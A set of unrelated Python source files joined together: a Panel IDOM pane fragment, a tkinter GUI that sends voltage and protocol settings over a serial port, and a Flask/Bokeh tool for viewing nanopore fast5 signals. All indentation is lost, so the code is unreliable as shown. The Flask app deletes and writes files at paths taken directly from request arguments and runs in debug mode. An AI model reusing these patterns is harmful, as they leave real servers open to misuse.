from idom.core.layout import LayoutEvent
dispatch = self._idom_layout.dispatch(LayoutEvent(**msg['msg']))
asyncio.run_coroutine_threadsafe(dispatch, loop=self._idom_loop)
for ref, (m, _) in self._models.items():
m.msg = None
push_on_root(ref)
return {}
async def _idom_layout_render_loop(self):
async with self._idom_layout:
while True:
update = await self._idom_layout.render()
self._idom_model = update.apply_to(self._idom_model)
for ref, (model, _) in self._models.items():
doc = state._views[ref][2]
if doc.session_context:
doc.add_next_tick_callback(partial(model.update, event=update))
else:
model.event = update
push_on_root(ref)
@classmethod
def applies(self, object):
from idom.core.component import Component
from idom.core.layout import Layout
if 'idom' in sys.modules:
if isinstance(object, (Component, Layout)):
return 0.8
elif callable(object):
return None
return False
@classmethod
def install(cls, packages, ignore_installed=False, fallback=None):
"""
Installs specified packages into application directory.
Arguments
---------
packages: list or tuple
The packages to install from npm
ignored_installed: boolean
Whether to ignore if the package was previously installed.
fallback: str or idom.component
The fallback to display while the component is loading
"""
import idom
from idom.config import IDOM_CLIENT_BUILD_DIR
idom_dist_dir = DIST_DIR / "idom"
if IDOM_CLIENT_BUILD_DIR.get() != idom_dist_dir:
IDOM_CLIENT_BUILD_DIR.set(idom_dist_dir)
# just in case packages were already installed but the build hasn't been
# copied over to DIST_DIR yet.
ignore_installed = True
return idom.install(packages, ignore_installed, fallback)
@classmethod
def use_param(cls, parameter):
"""
Links parameter to some IDOM state value and returns the linked
value.
Arguments
---------
parameter: param.Parameter
The parameter to link to a idom state value.
Returns
-------
An idom state value which is updated when the parameter changes.
"""
import idom
from ..depends import param_value_if_widget
parameter = param_value_if_widget(parameter)
initial = getattr(parameter.owner, parameter.name)
value, set_value = idom.hooks.use_state(initial)
def update(event):
set_value(event.new)
parameter.owner.param.watch(update, parameter.name)
return value
|
IOMaster_GUI_CommandSend.py
|
import tkinter as TK
import usb.core
import usb.util
import serial
import time
import threading
import serial.tools.list_ports
#from tkinter import *
from tkinter import ttk
from tkinter import messagebox
window = TK.Tk()
window.title("IO Master Setup")
window.geometry("400x500")
tabControl = ttk.Notebook(window)
sendTab = ttk.Frame(tabControl)
receiveTab = ttk.Frame(tabControl)
tabControl.add(sendTab, text= 'Send')
tabControl.add(receiveTab, text='Receive')
tabControl.grid(column=0, row=1, columnspan=2) #expand=1, fill="both")
ser = serial.Serial()
#def EntryCheck():
#entry check for com port
#try:
#txtout.insert(TK.END, txtin.get('1.0', TK.END))
#ser = serial.Serial(port=txtin.get('1.0', TK.END)) #baudrate=115200)
#except Exception:
# messagebox.showinfo("Error", "Could Not Find Device. Enter Valid COM Port")
# window.deiconify()
# return None
#window.mainloop()
#strg = txtin.get('1.0', TK.END)
#print(strg)
#ser = serial.Serial(port=strg, baudrate=115200)
#window.deiconify()
def InitializePopup():
window.withdraw()
popup = TK.Toplevel()
popup.title("Select Device Port")
popup.geometry("450x185")
txtlbl = TK.Label(popup, text = "Select COM Port")
txtlbl.pack()
txtin = TK.Text(popup, height=1, width=17)
txtin.pack()
EnterBtn = TK.Button(popup, text = "Select", command = lambda : EntryCheck())
EnterBtn.pack()
avlbl = TK.Label(popup, text = "Available COM Ports:")
avlbl.pack()
txtout = TK.Text(popup, height=5, width=50)
txtout.pack()
ports = list(serial.tools.list_ports.comports())
for p in ports:
txtout.insert(TK.END, p)
txtout.insert(TK.END, '\n')
txtout.configure(state = 'disable')
def EntryCheck():
#entry check for com port
global ser
strg = txtin.get('1.0', TK.END)
#ser = serial.Serial.port = strg.rstrip('n')
ser = serial.Serial(strg.rstrip('\n'), 57600, serial.EIGHTBITS, serial.PARITY_NONE, serial.STOPBITS_ONE)
OutConfigTxt.configure(state="normal")
OutConfigTxt.insert(TK.END, "COM Port: " + strg + '\n')
OutConfigTxt.configure(state="disable")
window.deiconify()
popup.destroy()
def read_from_port(ser):
while True:
reading = ser.read()
print(reading)
if reading == b'3':
messagebox.showinfo("Works", "Pushed Button")
def sendCommand(command):
ser.write(command)
class Label:
def __init__(self, win, text):
self.lbl=ttk.Label(win, text=text)
#self.lbl.grid(column=clmn, row=row)
class combobox:
def __init__(self, win, values):
self.cb=ttk.Combobox(win, values=values, state = "readonly")
def Configure_Results():
print("Configure Results!")
#Store VariablesI
Protocol = cb0.cb.get()
UVoltage = VHin.get('1.0', TK.END)
Frequency = cb2.cb.get()
LVoltage = VLin.get('1.0', TK.END)
DPower = cb5.cb.get()
DataRate = cb6.cb.get()
ClPolarity = cb7.cb.get()
ChPolarity = cb9.cb.get()
OutConfigTxt.configure(state="normal")
OutConfigTxt.delete('1.0', TK.END)
#if Protocol == "I2C":
#if Protocol == "UART":
#if Protocol == "SPI":
#if Protocol == "SWD":
#if Protocol == "RS-485":
if Protocol == "":
OutConfigTxt.insert(TK.END, "Protocol: N/A" + '\n')
else:
OutConfigTxt.insert(TK.END, "Protocol: " + Protocol + '\n')
if UVoltage == "":
OutConfigTxt.insert(TK.END, "Upper Voltage: N/A" + '\n')
else:
OutConfigTxt.insert(TK.END, "Upper Voltage: " + UVoltage)
if Frequency == "":
OutConfigTxt.insert(TK.END, "Frequency: N/A" + '\n')
else:
OutConfigTxt.insert(TK.END, "Frequency: " + Frequency + '\n')
if LVoltage == "":
OutConfigTxt.insert(TK.END, "Lower Voltage: N/A" + '\n')
else:
OutConfigTxt.insert(TK.END, "Lower Voltage: " + LVoltage)
if DPower == "":
OutConfigTxt.insert(TK.END, "Device Power Level: N/A" + '\n')
else:
OutConfigTxt.insert(TK.END, "Device Power Level: " + DPower + '\n')
if DataRate == "":
OutConfigTxt.insert(TK.END, "Data Rate: N/A" + '\n')
else:
OutConfigTxt.insert(TK.END, "Data Rate: " + DataRate + '\n')
if ClPolarity == "":
OutConfigTxt.insert(TK.END, "Clock Polarity: N/A" + '\n')
else:
OutConfigTxt.insert(TK.END, "Clock Polarity: " + ClPolarity + '\n')
if ChPolarity == "":
OutConfigTxt.insert(TK.END, "Chip Polarity: N/A" + '\n')
else:
OutConfigTxt.insert(TK.END, "Chip Polarity: " + ChPolarity + '\n')
OutConfigTxt.configure(state="disable")
if (float(UVoltage) > 15 or float(UVoltage) < float(LVoltage)):
print(float(UVoltage))
print(float(LVoltage))
messagebox.showinfo("Error", "Invalid Data.\n Pick a voltage of 15V or Lower. \n Also, Upper Voltage should be larger than Lower Voltage")
return
else:
VH = float(UVoltage)
if (float(LVoltage) < -15 or float(UVoltage) < float(LVoltage)):
messagebox.showinfo("Error", "Invalid Data.\n Pick a voltage of -15V or Higher for Lower Voltage. \n Also, Upper Voltage should be larger than Lower Voltage")
return
else:
VL = float(LVoltage)
#rewr=1 because we are writing, commandbits determines what we are setting, resister State is unknown
### No Push No Pull, VH, VL
rewr = 1
commandbits = 1
resisterStates = 0
byteSend(rewr, commandbits, resisterStates, VH, VL)
#End Function
def byteSend(rewr, commandbits, resisterStates, VH, VL):
#rewr=1 bit, commandbits=3, resisterstate=4 bits
rewr = rewr << 7
combits = commandbits << 4
commandByte = rewr | combits | resisterStates #byte 1
print(hex(commandByte))
TVH = round(((2**12 - 1) / 30) * (15 - VH))
TVL = round(((2**12 - 1) / 30) * (15 - VL))
UVH = (TVH >> 8) & 0xff
LVH = (TVH) & 0xff
UVL = (TVL >> 8) & 0xff
LVL = (TVL) & 0xff
OutConfigTxt.configure(state="normal")
Packet_Bytes = bytearray()
Packet_Bytes.append(commandByte)#byte1
Packet_Bytes.append(UVH)#byte2
Packet_Bytes.append(LVH)#byte3
Packet_Bytes.append(UVL)#byte4
Packet_Bytes.append(LVL)#byte5
OutConfigTxt.insert(TK.END, Packet_Bytes.hex())
OutConfigTxt.configure(state="disable")
print(Packet_Bytes)
sendCommand(Packet_Bytes)
def Data_To_Send():
dataToSend = DataText3.get('1.0', TK.END)
for letter in dataToSend.rstrip():
if letter is not '0' and letter is not '1':
messagebox.showinfo("Error", "Invalid Data.\n Os and 1s Only")
return
if dataToSend == '\n':
messagebox.showinfo("Error", "Please Enter Data to Send.\n Os and 1s Only")
return
if len(dataToSend.rstrip()) is not 8:
messagebox.showinfo("Error", "Invalid Data.\n Should be 8 bits long.\n Os and 1s Only")
return
#print(dataToSend.rstrip())
dataToSend = 's' + dataToSend.rstrip() + '\0'
#print(dataToSend.rstrip())
OutConfigTxt.configure(state="normal")
OutConfigTxt.delete('1.0', TK.END)
OutConfigTxt.insert(TK.END, "Data Sent: " + dataToSend.rstrip() + '\n' + str(len(dataToSend.rstrip())))
OutConfigTxt.configure(state="disable")
sendCommand(dataToSend.rstrip())
class Button:
def __init__(self, win, text):
self.btn=ttk.Button(win, text=text, command=self.press)
def press(self):
btn_text = self.btn.cget('text')
if btn_text == "Configure":
Configure_Results()
if btn_text == "Send Data":
Data_To_Send()
#Each object needs to be created ouside the function and placed on the window in the function
lbl0 = Label(window, "Protocol:") #Protocol
lbl1 = Label(sendTab, "Upper Voltage:") #Upper Voltage
lbl2 = Label(sendTab, "Frequency:") #Frequency
lbl3 = Label(sendTab, "Data to Send:") #Data to Send
lbl4 = Label(sendTab, "Lower Voltage:") #Lower Voltage
lbl5 = Label(sendTab, "Device Power Voltage:") #Device Power Voltage
lbl6 = Label(sendTab, "Data Rate:") #Data Rate
lbl7 = Label(sendTab, "Clock Polarity:") #Clock Polarity (Rise or fall)
lbl8 = Label(sendTab, "Device Address:") #Device Address
lbl9 = Label(sendTab, "Chip Select Polarity:") #Chip Select Polarity
lbl0.lbl.grid(column=0, row=0) #place protocol selection label (Always On)
cb0 = combobox(window, ["I2C", "UART", "SPI", "SWD", "RS-485", "Custom"]) #create drop down for protocol selection
VHin = TK.Text(sendTab, height=1, width=17) #Voltage Selection
cb2 = combobox(sendTab, ["1kHz", "10kHz", "100kHz", "1MHz"]) #Frequency Selection
VLin = TK.Text(sendTab, height=1, width=17) #Lower volatage level
cb5 = combobox(sendTab, ["3.3V","5V", "12V", "24V" ]) #Device Power Level
cb6 = combobox(sendTab, ["Data Rates"]) #Data Rates
cb7 = combobox(sendTab, ["Rising Edge", "Falling edge"]) #Clock Polarity
cb9 = combobox(sendTab, ["0", "1"]) #Chip Select Polarity
cb0.cb.grid(column=1, row=0) #Place drop down for protocols
DataText3 = TK.Text(sendTab, height=1, width=17) #Box to enter 8 bit command to board (gets checked)
AddressText = TK.Text(sendTab, height=1, width=17) #Box to enter the device address.
OutConfigTxt = TK.Text(window, height = 15, width = 42, state = "disabled") #Display sent configurables in this box
OutConfigTxt.grid(column=0, row=6, columnspan=3)
btn1 = Button(sendTab, "Configure") #Send configure
btn2 = Button(sendTab, "Send Data")
#Choose which objects are displayed based on the protocol chosen
def display_create(window):
#Create Interface for SPI
if cb0.cb.get() == 'SPI':
lbl1.lbl.grid(column=0, row=3) #Upper Voltage
lbl2.lbl.grid(column=0, row=5) #Frequency
lbl3.lbl.grid(column=0, row=10) #Data to send
lbl4.lbl.grid(column=0, row=2) #Lower Voltage
lbl5.lbl.grid(column=0, row=6) #Device Power
lbl6.lbl.grid(column=0, row=7) #Data Rate
lbl7.lbl.grid(column=0, row=4) #Clock Polarity
lbl8.lbl.grid(column=0, row=8) #Device Address
lbl9.lbl.grid(column=0, row=9) #Chip Select Polarity
VHin.grid(column=1, row=3) #Upper Voltage
cb2.cb.grid(column=1, row=5) #Frequency
VLin.grid(column=1, row=2) #Lower Voltage Level
cb5.cb.grid(column=1, row=6) #Device Power
cb6.cb.grid(column=1, row=7) #Data Rates
cb7.cb.grid(column=1, row=4) #Clock Polarity
cb9.cb.grid(column=1, row=9) #Chip Select Polarity
DataText3.grid(column=1, row=10) #Data to send
AddressText.grid(column=1, row=8) #Device Address Box
btn1.btn.grid(column=2, row=2) #Send configure
btn2.btn.grid(column=2, row=10) #Send Data from text box
#Display I2C Components
if cb0.cb.get() == 'I2C':
lbl1.lbl.grid(column=0, row=3) #Upper Voltage
lbl2.lbl.grid(column=0, row=5) #Frequency
lbl3.lbl.grid(column=0, row=10) #Data to send
lbl4.lbl.grid(column=0, row=2) #Lower Voltage
lbl5.lbl.grid(column=0, row=6) #Device Power
lbl6.lbl.grid(column=0, row=7) #Data Rate
lbl7.lbl.grid(column=0, row=4) #Clock Polarity
lbl8.lbl.grid(column=0, row=8) #Device Address
lbl9.lbl.grid_forget() #Chip Select Polarity
VHin.grid(column=1, row=3) #Upper Voltage
cb2.cb.grid(column=1, row=5) #Frequency
VLin.grid(column=1, row=2) #Lower Voltage Level
cb5.cb.grid(column=1, row=6) #Device Power
cb6.cb.grid(column=1, row=7) #Data Rates
cb7.cb.grid(column=1, row=4) #Clock Polarity
cb9.cb.grid_forget() #Chip Select Polarity
#Empty Unused Boxes
cb9.cb.set('')
DataText3.grid(column=1, row=10) #Data to send
AddressText.grid(column=1, row=8) #Device Address Box
btn1.btn.grid(column=2, row=2) #Send configure
btn2.btn.grid(column=2, row=10) #Send Data from text box
#Display UART Components
if cb0.cb.get() == 'UART':
lbl1.lbl.grid(column=0, row=3) #Upper Voltage
lbl2.lbl.grid_forget() #Frequency
lbl3.lbl.grid(column=0, row=10) #Data to send
lbl4.lbl.grid(column=0, row=2) #Lower Voltage
lbl5.lbl.grid(column=0, row=6) #Device Power
lbl6.lbl.grid(column=0, row=7) #Data Rate
lbl7.lbl.grid(column=0, row=4) #Clock Polarity
lbl8.lbl.grid_forget() #Device Address
lbl9.lbl.grid_forget() #Chip Select Polarity
VHin.grid(column=1, row=3) #Upper Voltage
cb2.cb.grid_forget() #Frequency
VLin.grid(column=1, row=2) #Lower Voltage Level
cb5.cb.grid(column=1, row=6) #Device Power
cb6.cb.grid(column=1, row=7) #Data Rates
cb7.cb.grid(column=1, row=4) #Clock Polarity
cb9.cb.grid_forget() #Chip Select Polarity
#Empty Unused Boxes
cb2.cb.set('')
cb9.cb.set('')
AddressText.delete('1.0', TK.END)
DataText3.grid(column=1, row=10) #Data to send
AddressText.grid_forget() #Device Address Box
btn1.btn.grid(column=2, row=2) #Send configure
btn2.btn.grid(column=2, row=10) #Send Data from text box
#Display SWD Components
if cb0.cb.get() == 'SWD':
lbl1.lbl.grid(column=0, row=3) #Upper Voltage
lbl2.lbl.grid_forget() #Frequency
lbl3.lbl.grid_forget() #Data to send
lbl4.lbl.grid(column=0, row=2) #Lower Voltage
lbl5.lbl.grid(column=0, row=6) #Device Power
lbl6.lbl.grid_forget() #Data Rate
lbl7.lbl.grid(column=0, row=4) #Clock Polarity
lbl8.lbl.grid_forget() #Device Address
lbl9.lbl.grid_forget() #Chip Select Polarity
VHin.grid(column=1, row=3) #Upper Voltage
cb2.cb.grid_forget() #Frequency
VLin.grid(column=1, row=2) #Lower Voltage Level
cb5.cb.grid(column=1, row=6) #Device Power
cb6.cb.grid_forget() #Data Rates
cb7.cb.grid(column=1, row=4) #Clock Polarity
cb9.cb.grid_forget() #Chip Select Polarity
#Empty Unused Boxes
cb2.cb.set('')
cb6.cb.set('')
cb9.cb.set('')
AddressText.delete('1.0', TK.END)
DataText3.delete('1.0', TK.END)
DataText3.grid_forget() #Data to send
AddressText.grid_forget() #Device Address Box
btn1.btn.grid(column=2, row=2) #Send configure
btn2.btn.grid_forget() #Send Data from text box
#display RS-485 Components
if cb0.cb.get() == 'RS-485':
lbl1.lbl.grid(column=0, row=3) #Upper Voltage
lbl2.lbl.grid_forget() #Frequency
lbl3.lbl.grid(column=0, row=10) #Data to send
lbl4.lbl.grid(column=0, row=2) #Lower Voltage
lbl5.lbl.grid(column=0, row=6) #Device Power
lbl6.lbl.grid(column=0, row=7) #Data Rate
lbl7.lbl.grid_forget() #Clock Polarity
lbl8.lbl.grid_forget() #Device Address
lbl9.lbl.grid_forget() #Chip Select Polarity
VHin.grid(column=1, row=3) #Upper Voltage
cb2.cb.grid_forget() #Frequency
VLin.grid(column=1, row=2) #Lower Voltage Level
cb5.cb.grid(column=1, row=6) #Device Power
cb6.cb.grid(column=1, row=7) #Data Rates
cb7.cb.grid_forget() #Clock Polarity
cb9.cb.grid_forget() #Chip Select Polarity
#Empty Unused Boxes
cb2.cb.set('')
cb7.cb.set('')
cb9.cb.set('')
AddressText.delete('1.0', TK.END)
DataText3.grid(column=1, row=10) #Data to send
AddressText.grid_forget() #Device Address Box
btn1.btn.grid(column=2, row=2) #Send configure
btn2.btn.grid(column=2, row=10) #Send Data from text box
#Display Custom Options
if cb0.cb.get() == 'Custom':
lbl1.lbl.grid(column=0, row=3) #Upper Voltage
lbl2.lbl.grid(column=0, row=5) #Frequency
lbl3.lbl.grid(column=0, row=10) #Data to send
lbl4.lbl.grid(column=0, row=2) #Lower Voltage
lbl5.lbl.grid(column=0, row=6) #Device Power
lbl6.lbl.grid(column=0, row=7) #Data Rate
lbl7.lbl.grid(column=0, row=4) #Clock Polarity
lbl8.lbl.grid(column=0, row=8) #Device Address
lbl9.lbl.grid(column=0, row=9) #Chip Select Polarity
VHin.grid(column=1, row=3) #Upper Voltage
cb2.cb.grid(column=1, row=5) #Frequency
VLin.grid(column=1, row=2) #Lower Voltage Level
cb5.cb.grid(column=1, row=6) #Device Power
cb6.cb.grid(column=1, row=7) #Data Rates
cb7.cb.grid(column=1, row=4) #Clock Polarity
cb9.cb.grid(column=1, row=9) #Chip Select Polarity
DataText3.grid(column=1, row=10) #Data to send
AddressText.grid(column=1, row=8) #Device Address Box
btn1.btn.grid(column=2, row=2) #Send configure
btn2.btn.grid(column=2, row=10) #Send Data from text box
cb0.cb.bind("<<ComboboxSelected>>", display_create) #link protocol selection combobox to ubove function. Display fields update when drop box changes.
def main():
#global ser
#ser = serial.Serial('/dev/ttyUSB0')
InitializePopup()
serialThread = threading.Thread(target=read_from_port, args=(ser,))
serialThread.start()
window.mainloop()
if (__name__ == '__main__'):
main()
|
main.py
|
from flask import Flask, render_template, request, redirect, Markup
import os
import sys
import time
import h5py
import traceback
import numpy as np
from bokeh.plotting import figure
from bokeh.resources import CDN
from bokeh.embed import file_html
from bokeh.models import Title, HoverTool, ColumnDataSource, FreehandDrawTool, BoxEditTool, BoxAnnotation, CustomJS, Rect, Spacer
from bokeh.models.widgets.buttons import AbstractButton, Toggle
import json
from tornado.ioloop import IOLoop
from threading import Thread
from bokeh.embed import server_document
from bokeh.layouts import column, row
from bokeh.models import ColumnDataSource, Slider
from bokeh.server.server import Server
from bokeh.themes import Theme
app = Flask(__name__)
signal = []
ut = None
lt = None
err = 5
err_win = 50
min_win = 150
max_merge = 50
stdev_scale = 0.75
stall_len = 0.25
@app.route('/test', methods=['GET'])
def bkapp_page():
script = server_document('http://localhost:5006/bkapp')
return render_template("embed.html", script=script, template="Flask")
@app.route("/",methods = ["POST", "GET"])
def home():
if request.method == "POST":
f5_path = request.form.get('f5_path')
type = request.form.get('type')
if not os.path.isdir(f5_path):
return render_template("home.html", error=True, f5_path=f5_path)
else:
return render_template("loading.html", f5_path=f5_path, type=type)
return render_template("home.html")
@app.route("/results")
def results(f5_path=None):
f5_path = request.args['f5_path']
type = request.args['type']
if not os.path.isdir(f5_path):
return render_template("error.html")
if request.args['processing'] == '0':
if os.path.isfile(f5_path+"/data_"+type+".tsv"):
exception = "Data file for already exists"
return render_template("exception.html", f5_path=f5_path, type=type, exception=exception)
if request.args['processing'] == '1':
os.remove(f5_path+"/data_"+type+".tsv")
return render_template("loading.html", f5_path=f5_path, type=type)
count = 0
with open(os.path.join(f5_path, "data_"+type+".tsv"), 'a') as out_sum:
for dirpath, dirnames, files in os.walk(f5_path):
for fast5 in files:
if fast5.endswith('.fast5'):
fast5_file = os.path.join(dirpath, fast5)
# extract data from file
data, multi = extract_f5_all(fast5_file, request.args['type'])
#print data to a single file
if not multi:
count += 1
ar = map(str, data['raw'])
out_sum.write('{}\t{}\t{}\n'.format(
fast5, data['readID'], '\t'.join(ar)))
else:
for read in data:
count += 1
ar = map(str, data[read]['raw'])
out_sum.write('{}\t{}\t{}\n'.format(
fast5, data[read]['readID'], '\t'.join(ar)))
return render_template("results.html", f5_path=f5_path, type=type, count=count)
@app.route("/view_graphs")
def view():
f5_path = request.args['f5_path']
type = request.args['type']
read = request.args.get('read_id')
id = ''
script = []
if read is None:
read = ""
reads = []
sig = None
segs = None
if not os.path.isfile(f5_path+"/data_"+type+".tsv"):
return render_template("error.html")
with open(f5_path+"/data_"+type+".tsv", 'rt') as data:
for num, l in enumerate(data):
l = l.strip('\n')
l = l.split('\t')
readID = l[1]
reads.append(l[1])
if read == readID:
fast5 = l[0]
if "." in l[4]:
sig = np.array([float(i) for i in l[4:]], dtype=float)
else:
sig = np.array([int(i) for i in l[4:]], dtype=int)
graph = dict()
if sig is not None:
global signal
signal = sig
print(signal)
Thread(target=bk_worker).start()
id = str(read)
script = server_document('http://localhost:5006/bkapp')
return render_template("view_graphs.html", f5_path=f5_path, type=type, id=id, script=script, count=len(reads), reads=reads)
else:
error = "The signal was unable to be found for "+read+" :(."
return render_template("error.html", error=error)
@app.route("/delete")
def delete():
f5_path = request.args['f5_path']
type = request.args['type']
if os.path.isfile(f5_path+"/data_"+type+".tsv"):
os.remove(f5_path+"/data_"+type+".tsv")
return redirect("/")
def extract_f5_all(filename, type):
'''
inputs:
filepath/name
args from command line
does:
open fast5 files, extract whole signal and read data and converts to pA by default
Returns:
dic for further processing/printing
'''
f5_dic = {}
multi = True
raw = False
if type == "raw":
raw = True
with h5py.File(filename, 'r') as hdf:
reads = list(hdf.keys())
if 'read' not in reads[1]:
multi = False
# single fast5 files
if not multi:
f5_dic = {'raw': [], 'seq': '', 'readID': '',
'digitisation': 0.0, 'offset': 0.0, 'range': 0.0,
'sampling_rate': 0.0}
# extract the data
try:
c = list(hdf['Raw/Reads'].keys())
for col in hdf['Raw/Reads/'][c[0]]['Signal'][()]:
f5_dic['raw'].append(int(col))
f5_dic['readID'] = hdf['Raw/Reads/'][c[0]].attrs['read_id'].decode()
digitisation = hdf['UniqueGlobalKey/channel_id'].attrs['digitisation']
offset = hdf['UniqueGlobalKey/channel_id'].attrs['offset']
range = float("{0:.2f}".format(hdf['UniqueGlobalKey/channel_id'].attrs['range']))
# convert to pA
if not raw:
f5_dic['raw'] = np.array(f5_dic['raw'], dtype=int)
f5_dic['raw'] = convert_to_pA_numpy(f5_dic['raw'], digitisation, range, offset)
f5_dic['raw'] = np.round(f5_dic['raw'], 2)
except:
traceback.print_exc()
sys.stderr.write("extract_fast5_all():failed to extract raw signal or fastq from {}".format(filename))
f5_dic = {}
# multi fast5 files
else:
for read in reads:
f5_dic[read] = {'raw': [], 'seq': '', 'readID': '',
'digitisation': 0.0, 'offset': 0.0, 'range': 0.0,
'sampling_rate': 0.0}
# extract the data
try:
for col in hdf[read]['Raw/Signal'][()]:
f5_dic[read]['raw'].append(int(col))
f5_dic[read]['readID'] = hdf[read]['Raw'].attrs['read_id'].decode()
digitisation = hdf[read]['channel_id'].attrs['digitisation']
offset = hdf[read]['channel_id'].attrs['offset']
range = float("{0:.2f}".format(hdf[read]['channel_id'].attrs['range']))
# convert to pA
if not raw:
f5_dic[read]['raw'] = np.array(f5_dic[read]['raw'], dtype=int)
f5_dic[read]['raw'] = convert_to_pA_numpy(f5_dic[read]['raw'], digitisation, range, offset)
f5_dic[read]['raw'] = np.round(f5_dic[read]['raw'], 2)
except:
traceback.print_exc()
sys.stderr.write("extract_fast5_all():failed to read readID: {}".format(read))
return f5_dic, multi
def convert_to_pA_numpy(d, digitisation, range, offset):
raw_unit = range / digitisation
return (d + offset) * raw_unit
def scale_outliers(sig, max, min):
''' Scale outliers to within m stdevs of median '''
''' Remove outliers that don't fit within the specified bounds '''
k = (sig > min) & (sig < max)
return sig[k]
def get_segs(sig, error, error_win, min_win, max_merge, std_scale, stall_len):
'''
Get segments from signal
This works by running through the signal and finding regions that are above
the bot and below the top parameters, with some error tollerance, for a
minimum window of length.
'''
mn = sig.min()
mx = sig.max()
mean = np.mean(sig)
median = np.median(sig)
# use this with outlier rejection to fix stdev thresholds
stdev = np.std(sig)
top = median + (stdev * std_scale)
bot = median - (stdev * std_scale)
# parameter tuning visualisation
# TODO: Put tuning plots here
# this is the algo. Simple yet effective
prev = False # previous string
err = 0 # total error
prev_err = 0 # consecutive error
c = 0 # counter
w = error_win # window to increase total error thresh
seg_dist = max_merge # distance between 2 segs to be merged as one
start = 0 # start pos
end = 0 # end pos
segs = [] # segments [(start, stop)]
left = []
right = []
for i in range(len(sig)):
a = sig[i]
if a < top and a > bot: # If datapoint is within range
if not prev:
start = i
prev = True
c += 1 # increase counter
w += 1 # increase window corrector count
if prev_err:
prev_err = 0
if c >= min_win and c >= w and not c % w: # if current window longer than detect limit, and corrector, and is divisible by corrector
err -= 1 # drop current error count by 1
else:
if prev and err < error:
c += 1
err += 1
prev_err += 1
if c >= min_win and c >= w and not c % w:
err -= 1
elif prev and (c >= min_win or not segs and c >= min_win * stall_len):
end = i - prev_err # go back to where error stretch began for accurate cutting
prev = False
if segs and start - segs[-1][1] < seg_dist: # if segs very close, merge them
segs[-1][1] = end
else:
segs.append([start,end])
left.append(start)
right.append(end) # save segment
c = 0
err = 0
prev_err = 0
elif prev:
prev = False
c = 0
err = 0
prev_err = 0
else:
continue
if segs:
return left, right
else:
return False
def bkapp(doc):
global signal
global ut
global lt
global show_segs
show_segs = False
ut = 0
lt = 0
if signal.any():
ut = max(signal)
lt = min(signal)
source = ColumnDataSource(data={
'signal' : signal,
'position' : list(range(0,len(signal)))
})
p = figure()
p.line('position','signal', source=source)
p.add_tools(HoverTool(
tooltips=[
('signal', '@signal'),
('position', '@position'),
],
formatters={
'signal' : 'printf',
'position' : 'printf'
},
mode='vline'
))
renderer = p.multi_line([[1,1]], [[1,1]], line_width=4, alpha=0.5, color='green')
draw_tool = FreehandDrawTool(renderers=[renderer])
p.add_tools(draw_tool)
src = ColumnDataSource({
'x':[1,1,1], 'y':[1,1,1], 'width':[1,1,1], 'height':[1,1,1]
})
box_renderer = p.rect('x', 'y', 'width', 'height', fill_alpha=0.4, fill_color='orange', line_color='orange', source=src)
box_draw_tool = BoxEditTool(renderers=[box_renderer], empty_value=1, num_objects = 5)
p.add_tools(box_draw_tool)
ut_slider = Slider(start=lt, end=max(signal), value=max(signal), name='upper_thresh', step=1, title="Upper Threshold")
lt_slider = Slider(start=min(signal), end=ut, value=min(signal), name='lower_thresh', step=1, title="Lower Threshold")
def ut_callback(attr, old, new):
global signal
global ut
global lt
ut = new
new_signal = scale_outliers(signal, ut, lt)
source.data = {
'signal' : new_signal,
'position' : list(range(0,len(new_signal)))
}
update_segs()
def lt_callback(attr, old, new):
global signal
global ut
global lt
lt = new
new_signal = scale_outliers(signal, ut, lt)
source.data = {
'signal' : new_signal,
'position' : list(range(0,len(new_signal)))
}
update_segs()
ut_slider.on_change('value', ut_callback)
lt_slider.on_change('value', lt_callback)
segments = ColumnDataSource(data={
'top' : [1,1],
'bottom' : [1,1],
'left' : [1,1],
'right' : [1,1]
})
button = Toggle(label="View Segments", sizing_mode="scale_width")
def segment_handler(new):
global show_segs
show_segs = new
if not new:
segments.data = {
'top' : [1,1],
'bottom' : [1,1],
'left' : [1,1],
'right' : [1,1]
}
update_segs()
button.on_click(segment_handler)
err_slider = Slider(start=0, end=20, value=5, name='error', step=1, title="Allowable Error")
err_win_slider = Slider(start=0, end=100, value=50, name='err_win', step=1, title="Error Window Size")
min_win_slider = Slider(start=0, end=500, value=150, name='min_win', step=1, title="Minimum Window Size")
max_merge_slider = Slider(start=0, end=100, value=50, name='max_merge', step=1, title="Max Merge Distance")
stdev_scale_slider = Slider(start=0, end=5, value=0.75, name='stdev_scale', step=0.01, title="Standard Deviation Scale Factor")
stall_len_slider = Slider(start=0, end=5, value=0.25, name='stall_len', step=0.01, title="Stall Length")
p.quad(top='top',bottom='bottom',left='left',right='right',source=segments,fill_alpha=0.5,fill_color='pink',line_color='pink')
def err_callback(atrr, old, new):
global err
err = new
update_segs()
def err_win_callback(atrr, old, new):
global err_win
err_win = new
update_segs()
def min_win_callback(atrr, old, new):
global min_win
min_win = new
update_segs()
def max_merge_callback(atrr, old, new):
global max_merge
max_merge = new
update_segs()
def stdev_scale_callback(atrr, old, new):
global stdev_scale
stdev_scale = new
update_segs()
def stall_len_callback(atrr, old, new):
global stall_len
stall_len = new
update_segs()
def update_segs():
#need to take into account the modified signal- somehow access it?
global err
global err_win
global min_win
global max_merge
global stdev_scale
global stall_len
global ut
global lt
global show_segs
left = None
right = None
if show_segs:
sig = scale_outliers(signal, ut, lt)
if sig.any():
left, right = get_segs(sig, err, err_win, min_win, max_merge, stdev_scale, stall_len)
if left is not None and right is not None:
segments.data = {
'top' : np.full(len(left),1000),
'bottom' : np.full(len(left),0),
'left' : left,
'right' : right
}
else:
segments.data = {
'top' : [1,1],
'bottom' : [1,1],
'left' : [1,1],
'right' : [1,1]
}
err_slider.on_change('value', err_callback)
err_win_slider.on_change('value', err_win_callback)
min_win_slider.on_change('value', min_win_callback)
max_merge_slider.on_change('value', max_merge_callback)
stdev_scale_slider.on_change('value', stdev_scale_callback)
stall_len_slider.on_change('value', stall_len_callback)
doc.add_root(row(column(Spacer(height=10), ut_slider, lt_slider, Spacer(height=10), button, err_slider, err_win_slider, min_win_slider, max_merge_slider, stdev_scale_slider, stall_len_slider, Spacer(height=10), sizing_mode="stretch_height"), p, sizing_mode="stretch_both"))
doc.theme = Theme(filename="theme.yaml")
def bk_worker():
# Can't pass num_procs > 1 in this configuration. If you need to run multiple
# processes, see e.g. flask_gunicorn_embed.py
print("I, the bk_worker, am being run")
server = Server({'/bkapp': bkapp}, io_loop=IOLoop(), allow_websocket_origin=["127.0.0.1:8080"])
server.start()
server.io_loop.start()
if __name__ == "__main__":
print('Please open the page http://127.0.0.1:8080 to access the SquiggleKit Web Application')
app.run(port="8080", debug=True)
|
bpytop.py
|
#!/usr/bin/env python3
# pylint: disable=not-callable, no-member, unsubscriptable-object
# indent = tab
